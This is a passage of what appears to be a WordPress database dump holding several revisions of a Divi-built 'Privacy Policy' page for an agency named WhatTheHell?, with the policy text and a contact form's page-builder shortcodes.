button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][/et_pb_contact_form][/et_pb_column][/et_pb_row][/et_pb_section]','Privacy Policy','','inherit','closed','closed','','749-revision-v1','','','2020-08-18 10:49:34','2020-08-18 10:49:34','',749,'https://wthtest1.in8.cdn-alpha.com/749-revision-v1/',0,'revision','',0),(753,1,'2020-08-18 10:55:16','2020-08-18 10:55:16','[et_pb_section fb_built=\"1\" admin_label=\"Page Header\" _builder_version=\"3.22\" background_image=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/circle-background-pattern.png\" custom_padding=\"67px|0px|67.1875px|0px|false|false\" animation_style=\"zoom\" animation_intensity_zoom=\"4%\"][et_pb_row _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_padding=\"|||\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"3%\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"4.5.6\" text_font=\"||||||||\" header_font=\"Montserrat|700||on|||||dotted\" header_text_color=\"#353740\" header_font_size=\"60px\" header_line_height=\"1.3em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_margin=\"|||\" animation_style=\"fade\" hover_enabled=\"0\" header_font_size_last_edited=\"off|desktop\" locked=\"off\"]<h1>Privacy Policy</h1>\n[/et_pb_text][et_pb_divider show_divider=\"off\" disabled_on=\"on|on|off\" _builder_version=\"3.2\" max_width=\"120px\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"30%\"][/et_pb_divider][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"About Us Section\" _builder_version=\"3.22\" background_image=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/business_01.jpg\" custom_margin=\"|5%||5%\" custom_margin_tablet=\"\" custom_margin_phone=\"|0px||0px\" custom_margin_last_edited=\"on|phone\" custom_padding=\"10%|||\" animation_style=\"zoom\" animation_direction=\"top\" animation_intensity_zoom=\"5%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"-200px\" box_shadow_color=\"#ffffff\"][et_pb_row admin_label=\"About Us Area\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_padding=\"27px|0px|0px|0px\" column_structure=\"2_3,1_3\"][et_pb_column type=\"2_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.5.6\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_text_align=\"left\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" background_color=\"#f7f7f7\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" max_width=\"700px\" module_alignment=\"left\" custom_margin=\"|||\" custom_padding=\"10%|10%|10%|10%\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\" animation_starting_opacity=\"100%\" hover_enabled=\"0\" box_shadow_style=\"preset1\" box_shadow_vertical=\"15px\" box_shadow_blur=\"45px\" box_shadow_color=\"rgba(0,0,0,0.15)\" locked=\"off\"]<div class=\"lp-positioned-content\">\n<div class=\"lp-element lp-pom-text nlh\" id=\"lp-pom-text-12\">\n<h2>Requested Information</h2>\n<p>Information is collected from you when you use e-mail forms to contact us, or when you contribute to or use some of the advanced features on the site. The information we collect is clearly identified on the web page on which we collect it. In addition, we may collect your IP address and use cookies unless you configure your web browser to not accept them.</p>\n<p>The WhatTheHell? website uses information request forms and e-mail options for visitors to request information or express their interest. We will not share, rent or sell your information to any third party, and will use reasonable efforts to maintain the confidentiality of the information you provide. Any information will be used for internal business purposes only, and to support your relationship with WhatTheHell?.</p>\n<h2>Opt Out</h2>\n<p>Visitors who request information may sign-up to receive future e-mail from WhatTheHell?. Those who sign-up for and those already receiving e-mail from WhatTheHell?, will always have the option to opt out of receiving messages included at the bottom of each e-mail.</p>\n<h2>Third-Party Sites</h2>\n<p>This site may contain links to other websites.WhatTheHell? is not responsible for the privacy practices or the content of these sites. Policy statements will vary by site and you need to the check individual policies to understand them.</p>\n<h2>Security</h2>\n<p>We utilize industry-standard encryption technologies when transferring and receiving user data exchanged with our site. We also have adequate security measures at our physical facilities to protect and retain information collected from you at our site.</p>\n</div>\n<p><a class=\"lp-element lp-pom-button\" id=\"lp-pom-button-15\" href=\"https://www.whatthehell.agency/privacypolicy/clkn/https/www.whatthehell.co/\" target=\"_self\" rel=\"noopener noreferrer\"><span class=\"label\">WhatTheHell?</span></a></p>\n</div>\n<div class=\"lp-element lp-pom-block\" id=\"lp-pom-block-11\"></div>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Contact Form Section\" _builder_version=\"4.5.6\" background_color=\"#d4b068\" custom_padding=\"110px||110px|\" animation_style=\"zoom\" animation_direction=\"bottom\" animation_intensity_zoom=\"10%\" hover_enabled=\"0\" saved_tabs=\"all\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Let\'s Start Something new<br /><span style=\"color: #FFF;\">Say Hello!</span></h2>\r[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.5.6\" text_font=\"Montserrat||||\" text_text_color=\"#353740\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" hover_enabled=\"0\"]<p><span>We would love to connect up and join your brand journey. Do not hesitate to question/drop us a line, As discerning mind always take better decision.</span></p>\n[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row admin_label=\"Contact Form\" _builder_version=\"3.25\" animation_style=\"fade\" global_module=\"630\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_contact_form email=\"dhiraj@wthtest1.in8.cdn-alpha.com\" custom_message=\"Hi my name is %%Name%%, Email id is %%Email%% and Mobile No is %%Mobile_No%%, my message is %%Message%%\" submit_button_text=\"Send\" module_id=\"et_pb_contact_form_0\" _builder_version=\"4.5.2\" form_field_background_color=\"rgba(255,255,255,0)\" form_field_text_color=\"#353740\" form_field_font=\"Montserrat||||\" form_field_font_size=\"16px\" custom_button=\"on\" button_text_color=\"#ffffff\" button_border_width=\"5px\" button_border_color=\"#ffffff\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#ffffff\" max_width=\"800px\" module_alignment=\"center\" animation_style=\"fade\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"-1px\" box_shadow_color=\"rgba(0,0,0,0.18)\" form_background_color=\"rgba(255,255,255,0)\" button_text_color_hover=\"#ffffff\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_border_color_hover=\"#ffffff\" button_letter_spacing_hover=\"2px\"][et_pb_contact_field field_id=\"Name\" field_title=\"Name\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Mobile_No\" field_title=\"Mobile No\" min_length=\"10\" max_length=\"10\" allowed_symbols=\"numbers\" fullwidth_field=\"on\" _builder_version=\"4.5.2\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Email\" field_title=\"Email Address\" field_type=\"email\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Message\" field_title=\"Message\" field_type=\"text\" fullwidth_field=\"on\" _builder_version=\"4.4.9\" custom_margin=\"||60px|\" custom_padding=\"|||\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][/et_pb_contact_form][/et_pb_column][/et_pb_row][/et_pb_section]','Privacy Policy','','publish','closed','closed','','privacy-policy','','','2020-08-18 10:56:38','2020-08-18 10:56:38','',0,'https://wthtest1.in8.cdn-alpha.com/?page_id=753',0,'page','',0),(754,1,'2020-08-18 10:50:48','2020-08-18 10:50:48','<!-- wp:divi/placeholder /-->','Privacy Policy','','inherit','closed','closed','','753-revision-v1','','','2020-08-18 10:50:48','2020-08-18 10:50:48','',753,'https://wthtest1.in8.cdn-alpha.com/753-revision-v1/',0,'revision','',0),(757,1,'2020-08-18 10:55:16','2020-08-18 10:55:16','[et_pb_section fb_built=\"1\" admin_label=\"Page Header\" _builder_version=\"3.22\" background_image=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/circle-background-pattern.png\" custom_padding=\"67px|0px|67.1875px|0px|false|false\" animation_style=\"zoom\" animation_intensity_zoom=\"4%\"][et_pb_row _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_padding=\"|||\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"3%\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"4.5.6\" text_font=\"||||||||\" header_font=\"Montserrat|700||on|||||dotted\" header_text_color=\"#353740\" header_font_size=\"60px\" header_line_height=\"1.3em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_margin=\"|||\" animation_style=\"fade\" hover_enabled=\"0\" header_font_size_last_edited=\"off|desktop\" locked=\"off\"]<h1>Privacy Policy</h1>\n[/et_pb_text][et_pb_divider show_divider=\"off\" disabled_on=\"on|on|off\" _builder_version=\"3.2\" max_width=\"120px\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"30%\"][/et_pb_divider][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"About Us Section\" _builder_version=\"3.22\" background_image=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/business_01.jpg\" custom_margin=\"|5%||5%\" custom_margin_tablet=\"\" custom_margin_phone=\"|0px||0px\" custom_margin_last_edited=\"on|phone\" custom_padding=\"10%|||\" animation_style=\"zoom\" animation_direction=\"top\" animation_intensity_zoom=\"5%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"-200px\" box_shadow_color=\"#ffffff\"][et_pb_row admin_label=\"About Us Area\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_padding=\"27px|0px|0px|0px\" column_structure=\"2_3,1_3\"][et_pb_column type=\"2_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.5.6\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_text_align=\"left\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" background_color=\"#f7f7f7\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" max_width=\"700px\" module_alignment=\"left\" custom_margin=\"|||\" custom_padding=\"10%|10%|10%|10%\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\" animation_starting_opacity=\"100%\" hover_enabled=\"0\" box_shadow_style=\"preset1\" box_shadow_vertical=\"15px\" box_shadow_blur=\"45px\" box_shadow_color=\"rgba(0,0,0,0.15)\" locked=\"off\"]<div class=\"lp-positioned-content\">\n<div class=\"lp-element lp-pom-text nlh\" id=\"lp-pom-text-12\">\n<h2>Requested Information</h2>\n<p>Information is collected from you when you use e-mail forms to contact us, or when you contribute to or use some of the advanced features on the site. The information we collect is clearly identified on the web page on which we collect it. In addition, we may collect your IP address and use cookies unless you configure your web browser to not accept them.</p>\n<p>The WhatTheHell? website uses information request forms and e-mail options for visitors to request information or express their interest. We will not share, rent or sell your information to any third party, and will use reasonable efforts to maintain the confidentiality of the information you provide. Any information will be used for internal business purposes only, and to support your relationship with WhatTheHell?.</p>\n<h2>Opt Out</h2>\n<p>Visitors who request information may sign-up to receive future e-mail from WhatTheHell?. Those who sign-up for and those already receiving e-mail from WhatTheHell?, will always have the option to opt out of receiving messages included at the bottom of each e-mail.</p>\n<h2>Third-Party Sites</h2>\n<p>This site may contain links to other websites.WhatTheHell? is not responsible for the privacy practices or the content of these sites. Policy statements will vary by site and you need to the check individual policies to understand them.</p>\n<h2>Security</h2>\n<p>We utilize industry-standard encryption technologies when transferring and receiving user data exchanged with our site. We also have adequate security measures at our physical facilities to protect and retain information collected from you at our site.</p>\n</div>\n<p><a class=\"lp-element lp-pom-button\" id=\"lp-pom-button-15\" href=\"https://www.whatthehell.agency/privacypolicy/clkn/https/www.whatthehell.co/\" target=\"_self\" rel=\"noopener noreferrer\"><span class=\"label\">WhatTheHell?</span></a></p>\n</div>\n<div class=\"lp-element lp-pom-block\" id=\"lp-pom-block-11\"></div>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Contact Form Section\" _builder_version=\"4.5.6\" background_color=\"#d4b068\" custom_padding=\"110px||110px|\" animation_style=\"zoom\" animation_direction=\"bottom\" animation_intensity_zoom=\"10%\" hover_enabled=\"0\" saved_tabs=\"all\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Let\'s Start Something new<br /><span style=\"color: #FFF;\">Say Hello!</span></h2>\r[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#353740\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.</p>\r[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row admin_label=\"Contact Form\" _builder_version=\"3.25\" animation_style=\"fade\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_contact_form captcha=\"off\" submit_button_text=\"Send\" module_id=\"et_pb_contact_form_0\" _builder_version=\"3.23\" form_field_background_color=\"rgba(255,255,255,0)\" form_field_text_color=\"#353740\" form_field_font=\"Montserrat||||\" form_field_font_size=\"16px\" custom_button=\"on\" button_text_color=\"#ffffff\" button_border_width=\"5px\" button_border_color=\"#ffffff\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#ffffff\" max_width=\"800px\" module_alignment=\"center\" animation_style=\"fade\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"-1px\" box_shadow_color=\"rgba(0,0,0,0.18)\" form_background_color=\"rgba(255,255,255,0)\" button_text_color_hover=\"#ffffff\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_border_color_hover=\"#ffffff\" button_letter_spacing_hover=\"2px\"][et_pb_contact_field field_id=\"Name\" field_title=\"Name\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Email\" field_title=\"Email Address\" field_type=\"email\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Company\" field_title=\"Company Name\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Message\" field_title=\"Message\" field_type=\"text\" fullwidth_field=\"on\" _builder_version=\"3.16\" custom_margin=\"||60px|\" custom_padding=\"|||\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][/et_pb_contact_form][/et_pb_column][/et_pb_row][/et_pb_section]','Privacy Policy','','inherit','closed','closed','','753-revision-v1','','','2020-08-18 10:55:16','2020-08-18 10:55:16','',753,'https://wthtest1.in8.cdn-alpha.com/753-revision-v1/',0,'revision','',0),(759,1,'2020-08-18 10:56:22','2020-08-18 10:56:22','[et_pb_section fb_built=\"1\" admin_label=\"Page Header\" _builder_version=\"3.22\" background_image=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/circle-background-pattern.png\" custom_padding=\"67px|0px|67.1875px|0px|false|false\" animation_style=\"zoom\" animation_intensity_zoom=\"4%\"][et_pb_row _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_padding=\"|||\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"3%\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"4.5.6\" text_font=\"||||||||\" header_font=\"Montserrat|700||on|||||dotted\" header_text_color=\"#353740\" header_font_size=\"60px\" header_line_height=\"1.3em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_margin=\"|||\" animation_style=\"fade\" hover_enabled=\"0\" header_font_size_last_edited=\"off|desktop\" locked=\"off\"]<h1>Privacy Policy</h1>\n[/et_pb_text][et_pb_divider show_divider=\"off\" disabled_on=\"on|on|off\" _builder_version=\"3.2\" max_width=\"120px\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"30%\"][/et_pb_divider][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"About Us Section\" _builder_version=\"3.22\" background_image=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/business_01.jpg\" custom_margin=\"|5%||5%\" custom_margin_tablet=\"\" custom_margin_phone=\"|0px||0px\" custom_margin_last_edited=\"on|phone\" custom_padding=\"10%|||\" animation_style=\"zoom\" animation_direction=\"top\" animation_intensity_zoom=\"5%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"-200px\" box_shadow_color=\"#ffffff\"][et_pb_row admin_label=\"About Us Area\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_padding=\"27px|0px|0px|0px\" column_structure=\"2_3,1_3\"][et_pb_column type=\"2_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.5.6\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_text_align=\"left\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" background_color=\"#f7f7f7\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" max_width=\"700px\" module_alignment=\"left\" custom_margin=\"|||\" custom_padding=\"10%|10%|10%|10%\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\" animation_starting_opacity=\"100%\" hover_enabled=\"0\" box_shadow_style=\"preset1\" box_shadow_vertical=\"15px\" box_shadow_blur=\"45px\" box_shadow_color=\"rgba(0,0,0,0.15)\" locked=\"off\"]<div class=\"lp-positioned-content\">\n<div class=\"lp-element lp-pom-text nlh\" id=\"lp-pom-text-12\">\n<h2>Requested Information</h2>\n<p>Information is collected from you when you use e-mail forms to contact us, or when you contribute to or use some of the advanced features on the site. The information we collect is clearly identified on the web page on which we collect it. In addition, we may collect your IP address and use cookies unless you configure your web browser to not accept them.</p>\n<p>The WhatTheHell? website uses information request forms and e-mail options for visitors to request information or express their interest. We will not share, rent or sell your information to any third party, and will use reasonable efforts to maintain the confidentiality of the information you provide. Any information will be used for internal business purposes only, and to support your relationship with WhatTheHell?.</p>\n<h2>Opt Out</h2>\n<p>Visitors who request information may sign-up to receive future e-mail from WhatTheHell?. Those who sign-up for and those already receiving e-mail from WhatTheHell?, will always have the option to opt out of receiving messages included at the bottom of each e-mail.</p>\n<h2>Third-Party Sites</h2>\n<p>This site may contain links to other websites.WhatTheHell? is not responsible for the privacy practices or the content of these sites. Policy statements will vary by site and you need to the check individual policies to understand them.</p>\n<h2>Security</h2>\n<p>We utilize industry-standard encryption technologies when transferring and receiving user data exchanged with our site. We also have adequate security measures at our physical facilities to protect and retain information collected from you at our site.</p>\n</div>\n<p><a class=\"lp-element lp-pom-button\" id=\"lp-pom-button-15\" href=\"https://www.whatthehell.agency/privacypolicy/clkn/https/www.whatthehell.co/\" target=\"_self\" rel=\"noopener noreferrer\"><span class=\"label\">WhatTheHell?</span></a></p>\n</div>\n<div class=\"lp-element lp-pom-block\" id=\"lp-pom-block-11\"></div>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Contact Form Section\" _builder_version=\"4.5.6\" background_color=\"#d4b068\" custom_padding=\"110px||110px|\" animation_style=\"zoom\" animation_direction=\"bottom\" animation_intensity_zoom=\"10%\" 